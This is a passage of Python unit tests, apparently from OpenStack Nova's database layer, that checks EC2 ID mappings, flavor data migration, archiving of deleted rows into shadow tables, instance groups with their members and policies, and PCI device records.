check_exc_format(db.get_instance_uuid_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_uuid, 'fake')
def test_ec2_volume_create(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(vol['id'])
self.assertEqual(vol['uuid'], 'fake-uuid')
def test_ec2_volume_get_by_id(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_id(self.ctxt, vol['id'])
self.assertEqual(vol2['uuid'], vol['uuid'])
def test_ec2_volume_get_by_uuid(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_uuid(self.ctxt, vol['uuid'])
self.assertEqual(vol2['id'], vol['id'])
def test_ec2_snapshot_create(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(snap['id'])
self.assertEqual(snap['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_ec2_id(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_ec2_id(self.ctxt, snap['id'])
self.assertEqual(snap2['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_uuid(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(snap['id'], snap2['id'])
def test_ec2_snapshot_get_by_ec2_id_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_ec2_id,
self.ctxt, 123456)
def test_ec2_snapshot_get_by_uuid_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_uuid,
self.ctxt, 'fake-uuid')
def test_ec2_instance_create(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(inst['id'])
self.assertEqual(inst['uuid'], 'fake-uuid')
def test_ec2_instance_get_by_uuid(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_id(self.ctxt, inst['id'])
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_uuid_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 'uuid-not-present')
def test_ec2_instance_get_by_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 12345)
def test_get_instance_uuid_by_ec2_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst_uuid = db.get_instance_uuid_by_ec2_id(self.ctxt, inst['id'])
self.assertEqual(inst_uuid, 'fake-uuid')
def test_get_instance_uuid_by_ec2_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.get_instance_uuid_by_ec2_id,
self.ctxt, 100500)
class FlavorMigrationTestCase(test.TestCase):
def test_augment_flavor_to_migrate_no_extra_specs(self):
flavor = objects.Flavor()
db_flavor = {
'extra_specs': {'foo': 'bar'}}
sqlalchemy_api._augment_flavor_to_migrate(flavor, db_flavor)
self.assertTrue(flavor.obj_attr_is_set('extra_specs'))
self.assertEqual(db_flavor['extra_specs'], flavor.extra_specs)
def test_augment_flavor_to_migrate_extra_specs_merge(self):
flavor = objects.Flavor()
flavor.extra_specs = {'foo': '1', 'bar': '2'}
db_flavor = {
'extra_specs': {'bar': '3', 'baz': '4'}
}
sqlalchemy_api._augment_flavor_to_migrate(flavor, db_flavor)
self.assertEqual({'foo': '1', 'bar': '2', 'baz': '4'},
flavor.extra_specs)
@mock.patch('nova.db.sqlalchemy.api._augment_flavor_to_migrate')
def test_augment_flavors_to_migrate(self, mock_augment):
instance = objects.Instance()
instance.flavor = objects.Flavor(flavorid='foo')
instance.old_flavor = None
instance.new_flavor = None
sqlalchemy_api._augment_flavors_to_migrate(instance,
{'foo': 'bar'})
mock_augment.assert_called_once_with(instance.flavor, 'bar')
@mock.patch('nova.db.sqlalchemy.api._augment_flavor_to_migrate')
@mock.patch('nova.db.sqlalchemy.api.flavor_get_by_flavor_id')
def test_augment_flavors_to_migrate_uses_cache(self, mock_get,
mock_augment):
instance = objects.Instance(context=context.get_admin_context())
instance.flavor = objects.Flavor(flavorid='foo')
instance.old_flavor = objects.Flavor(flavorid='foo')
instance.new_flavor = objects.Flavor(flavorid='bar')
flavor_cache = {'bar': 'bar_flavor'}
mock_get.return_value = 'foo_flavor'
sqlalchemy_api._augment_flavors_to_migrate(instance, flavor_cache)
self.assertIn('foo', flavor_cache)
self.assertEqual('foo_flavor', flavor_cache['foo'])
mock_get.assert_called_once_with(instance._context, 'foo', 'yes')
def test_migrate_flavor(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
db.flavor_extra_specs_update_or_create(ctxt, flavor.flavorid,
{'new_spec': 'foo'})
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': 'foobar'},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
instance = db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(1, match)
self.assertEqual(1, done)
extra = db.instance_extra_get_by_instance_uuid(ctxt, instance['uuid'],
columns=['flavor'])
flavorinfo = jsonutils.loads(extra.flavor)
self.assertIsNone(flavorinfo['old'])
self.assertIsNone(flavorinfo['new'])
curflavor = obj_base.NovaObject.obj_from_primitive(flavorinfo['cur'])
self.assertEqual(flavor.flavorid, curflavor.flavorid)
def test_migrate_flavor_honors_limit(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
db.flavor_extra_specs_update_or_create(ctxt, flavor.flavorid,
{'new_spec': 'foo'})
for i in (1, 2, 3, 4, 5):
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': 'foobar'},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, 2, {})
self.assertEqual(2, match)
self.assertEqual(2, done)
match, done = db.migrate_flavor_data(ctxt, 1, {})
self.assertEqual(1, match)
self.assertEqual(1, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(2, match)
self.assertEqual(2, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(0, match)
self.assertEqual(0, done)
def test_migrate_flavor_honors_states(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'task_state': task_states.SPAWNING,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'vm_state': vm_states.RESCUED,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'vm_state': vm_states.RESIZED,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(4, match)
self.assertEqual(1, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(3, match)
self.assertEqual(0, done)
class ArchiveTestCase(test.TestCase):
def setUp(self):
super(ArchiveTestCase, self).setUp()
self.context = context.get_admin_context()
self.engine = get_engine()
self.conn = self.engine.connect()
self.instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "instance_id_mappings")
self.shadow_instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "shadow_instance_id_mappings")
self.dns_domains = sqlalchemyutils.get_table(
self.engine, "dns_domains")
self.shadow_dns_domains = sqlalchemyutils.get_table(
self.engine, "shadow_dns_domains")
self.consoles = sqlalchemyutils.get_table(self.engine, "consoles")
self.console_pools = sqlalchemyutils.get_table(
self.engine, "console_pools")
self.shadow_consoles = sqlalchemyutils.get_table(
self.engine, "shadow_consoles")
self.shadow_console_pools = sqlalchemyutils.get_table(
self.engine, "shadow_console_pools")
self.instances = sqlalchemyutils.get_table(self.engine, "instances")
self.shadow_instances = sqlalchemyutils.get_table(
self.engine, "shadow_instances")
self.uuidstrs = []
for unused in range(6):
self.uuidstrs.append(stdlib_uuid.uuid4().hex)
self.ids = []
self.id_tablenames_to_cleanup = set(["console_pools", "consoles"])
self.uuid_tablenames_to_cleanup = set(["instance_id_mappings",
"instances"])
self.domain_tablenames_to_cleanup = set(["dns_domains"])
def test_shadow_tables(self):
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table_name in metadata.tables:
# NOTE(rpodolyaka): migration 209 introduced a few new tables,
# which don't have shadow tables and it's
# completely OK, so we should skip them here
if table_name.startswith("dump_"):
continue
# NOTE(snikitin): migration 266 introduced a new table 'tags',
            #                 which has no shadow table, and that's
# completely OK, so we should skip it here
if table_name == 'tags':
continue
if table_name.startswith("shadow_"):
self.assertIn(table_name[7:], metadata.tables)
continue
self.assertTrue(db_utils.check_shadow_table(self.engine,
table_name))
def test_archive_deleted_rows(self):
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
# Set 4 to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qiim = sql.select([self.instance_id_mappings]).where(self.
instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 4 left in main
self.assertEqual(len(rows), 4)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 2 in shadow
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 4 in shadow
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we still have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we still have 4 in shadow
self.assertEqual(len(rows), 4)
def test_archive_deleted_rows_for_every_uuid_table(self):
tablenames = []
for model_class in models.__dict__.itervalues():
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
tablenames.sort()
for tablename in tablenames:
ret = self._test_archive_deleted_rows_for_one_uuid_table(tablename)
if ret == 0:
self.uuid_tablenames_to_cleanup.add(tablename)
def _test_archive_deleted_rows_for_one_uuid_table(self, tablename):
""":returns: 0 on success, 1 if no uuid column, 2 if insert failed."""
main_table = sqlalchemyutils.get_table(self.engine, tablename)
if not hasattr(main_table.c, "uuid"):
# Not a uuid table, so skip it.
return 1
shadow_table = sqlalchemyutils.get_table(
self.engine, "shadow_" + tablename)
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = main_table.insert().values(uuid=uuidstr)
try:
self.conn.execute(ins_stmt)
except db_exc.DBError:
# This table has constraints that require a table-specific
# insert, so skip it.
return 2
# Set 4 to deleted
update_statement = main_table.update().\
where(main_table.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qmt = sql.select([main_table]).where(main_table.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qmt).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qst = sql.select([shadow_table]).\
where(shadow_table.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qst).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 4 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 4)
# Verify we have 2 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we still have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we still have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
return 0
def test_archive_deleted_rows_no_id_column(self):
uuidstr0 = self.uuidstrs[0]
ins_stmt = self.dns_domains.insert().values(domain=uuidstr0)
self.conn.execute(ins_stmt)
update_statement = self.dns_domains.update().\
where(self.dns_domains.c.domain == uuidstr0).\
values(deleted=True)
self.conn.execute(update_statement)
qdd = sql.select([self.dns_domains], self.dns_domains.c.domain ==
uuidstr0)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 1)
qsdd = sql.select([self.shadow_dns_domains],
self.shadow_dns_domains.c.domain == uuidstr0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 0)
db.archive_deleted_rows(self.context, max_rows=1)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 1)
def test_archive_deleted_rows_fk_constraint(self):
# consoles.pool_id depends on console_pools.id
# SQLite doesn't enforce foreign key constraints without a pragma.
dialect = self.engine.url.get_dialect()
if dialect == sqlite.dialect:
# We're seeing issues with foreign key support in SQLite 3.6.20
# SQLAlchemy doesn't support it at all with < SQLite 3.6.19
# It works fine in SQLite 3.7.
# So return early to skip this test if running SQLite < 3.7
import sqlite3
tup = sqlite3.sqlite_version_info
if tup[0] < 3 or (tup[0] == 3 and tup[1] < 7):
self.skipTest(
'sqlite version too old for reliable SQLA foreign_keys')
self.conn.execute("PRAGMA foreign_keys = ON")
ins_stmt = self.console_pools.insert().values(deleted=1)
result = self.conn.execute(ins_stmt)
id1 = result.inserted_primary_key[0]
self.ids.append(id1)
ins_stmt = self.consoles.insert().values(deleted=1,
pool_id=id1)
result = self.conn.execute(ins_stmt)
id2 = result.inserted_primary_key[0]
self.ids.append(id2)
# The first try to archive console_pools should fail, due to FK.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 0)
# Then archiving consoles should work.
num = db.archive_deleted_rows_for_table(self.context, "consoles")
self.assertEqual(num, 1)
# Then archiving console_pools should work.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 1)
def test_archive_deleted_rows_2_tables(self):
# Add 6 rows to each table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
ins_stmt2 = self.instances.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt2)
# Set 4 of each to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
update_statement2 = self.instances.update().\
where(self.instances.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement2)
# Verify we have 6 in each main table
qiim = sql.select([self.instance_id_mappings]).where(
self.instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
self.assertEqual(len(rows), 6)
qi = sql.select([self.instances]).where(self.instances.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(rows), 6)
# Verify we have 0 in each shadow table
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
self.assertEqual(len(rows), 0)
qsi = sql.select([self.shadow_instances]).\
where(self.shadow_instances.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(rows), 0)
# Archive 7 rows, which should be 4 in one table and 3 in the other.
db.archive_deleted_rows(self.context, max_rows=7)
# Verify we have 5 left in the two main tables combined
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 5)
# Verify we have 7 in the two shadow tables combined.
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 7)
# Archive the remaining deleted rows.
db.archive_deleted_rows(self.context, max_rows=1)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=500)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
class InstanceGroupDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceGroupDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
def _get_default_values(self):
return {'name': 'fake_name',
'user_id': self.user_id,
'project_id': self.project_id}
def _create_instance_group(self, context, values, policies=None,
members=None):
return db.instance_group_create(context, values, policies=policies,
members=members)
def test_instance_group_create_no_key(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
def test_instance_group_create_with_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
def test_instance_group_create_with_same_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
self._create_instance_group(self.context, values)
self.assertRaises(exception.InstanceGroupIdExists,
self._create_instance_group, self.context, values)
def test_instance_group_get(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self._assertEqualObjects(result1, result2)
def test_instance_group_update_simple(self):
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
values = {'name': 'new_name', 'user_id': 'new_user',
'project_id': 'new_project'}
db.instance_group_update(self.context, result1['uuid'],
values)
result2 = db.instance_group_get(self.context, result1['uuid'])
self.assertEqual(result1['uuid'], result2['uuid'])
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result2, values, ignored_keys)
def test_instance_group_delete(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
db.instance_group_delete(self.context, result['uuid'])
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete, self.context,
result['uuid'])
def test_instance_group_get_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_get,
self.context,
'nonexistent')
def test_instance_group_delete_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete,
self.context,
'nonexistent')
def test_instance_group_get_all(self):
groups = db.instance_group_get_all(self.context)
self.assertEqual(0, len(groups))
value = self._get_default_values()
result1 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
self.assertEqual(1, len(groups))
value = self._get_default_values()
result2 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
def test_instance_group_get_all_by_project_id(self):
groups = db.instance_group_get_all_by_project_id(self.context,
'invalid_project_id')
self.assertEqual(0, len(groups))
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all_by_project_id(self.context,
'fake_project')
self.assertEqual(1, len(groups))
values = self._get_default_values()
values['project_id'] = 'new_project_id'
result2 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
projects = [{'name': 'fake_project', 'value': [result1]},
{'name': 'new_project_id', 'value': [result2]}]
for project in projects:
groups = db.instance_group_get_all_by_project_id(self.context,
project['name'])
self._assertEqualListsOfObjects(project['value'], groups)
def test_instance_group_update(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
id = result['uuid']
values = self._get_default_values()
values['name'] = 'new_fake_name'
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self.assertEqual(result['name'], 'new_fake_name')
        # update members
values = self._get_default_values()
members = ['instance_id1', 'instance_id2']
values['members'] = members
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
        # update policies
values = self._get_default_values()
policies = ['policy1', 'policy2']
values['policies'] = policies
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
# test invalid ID
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_update, self.context,
'invalid_id', values)
def test_instance_group_get_by_instance(self):
values = self._get_default_values()
group1 = self._create_instance_group(self.context, values)
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, group1.uuid, members)
group2 = db.instance_group_get_by_instance(self.context,
'instance_id1')
self.assertEqual(group2.uuid, group1.uuid)
class InstanceGroupMembersDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_members_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
members = ['instance_id1', 'instance_id2']
result = self._create_instance_group(self.context, values,
members=members)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
def test_instance_group_members_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members = db.instance_group_members_get(self.context, id)
self.assertEqual(members, [])
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
def test_instance_group_members_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
# check add with existing keys
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
for instance_id in members3[:]:
db.instance_group_member_delete(self.context, id, instance_id)
members3.remove(instance_id)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_members_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_member_delete, self.context,
'invalidid', 'instance_id1')
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members)
self.assertRaises(exception.InstanceGroupMemberNotFound,
db.instance_group_member_delete,
self.context, id, 'invalid_id')
class InstanceGroupPoliciesDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_policies_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
policies = ['policy1', 'policy2']
result = self._create_instance_group(self.context, values,
policies=policies)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
def test_instance_group_policies_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies = db.instance_group_policies_get(self.context, id)
self.assertEqual(policies, [])
policies2 = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies2)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies2)
def test_instance_group_policies_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies2 = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies2)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies2)
policies3 = ['policy1', 'policy2', 'policy3']
db.instance_group_policies_add(self.context, id, policies3)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
def test_instance_group_policies_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
policies3 = ['policy1', 'policy2', 'policy3']
db.instance_group_policies_add(self.context, id, policies3)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
for policy in policies3[:]:
db.instance_group_policy_delete(self.context, id, policy)
policies3.remove(policy)
policies = db.instance_group_policies_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(policies, policies3)
def test_instance_group_policies_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_policies_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_policy_delete, self.context,
'invalidid', 'policy1')
policies = ['policy1', 'policy2']
db.instance_group_policies_add(self.context, id, policies)
self.assertRaises(exception.InstanceGroupPolicyNotFound,
db.instance_group_policy_delete,
self.context, id, 'invalid_policy')
class PciDeviceDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(PciDeviceDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
self.admin_context = context.get_admin_context()
self.ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
def _get_fake_pci_devs(self):
return {'id': 3353,
'compute_node_id': 1,
'address': '0000:0f:08.7',
'vendor_id': '8086',
'product_id': '1520',
'numa_node': 1,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}, {'id': 3356,
'compute_node_id': 1,
'address': '0000:0f:03.7',
'vendor_id': '8083',
'product_id': '1523',
'numa_node': 0,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}
def _create_fake_pci_devs(self):
v1, v2 = self._get_fake_pci_devs()
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
return (v1, v2)
def test_pci_device_get_by_addr(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_addr(self.admin_context, 1,
'0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_addr_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_get_by_addr, self.admin_context,
1, '0000:0f:08:09')
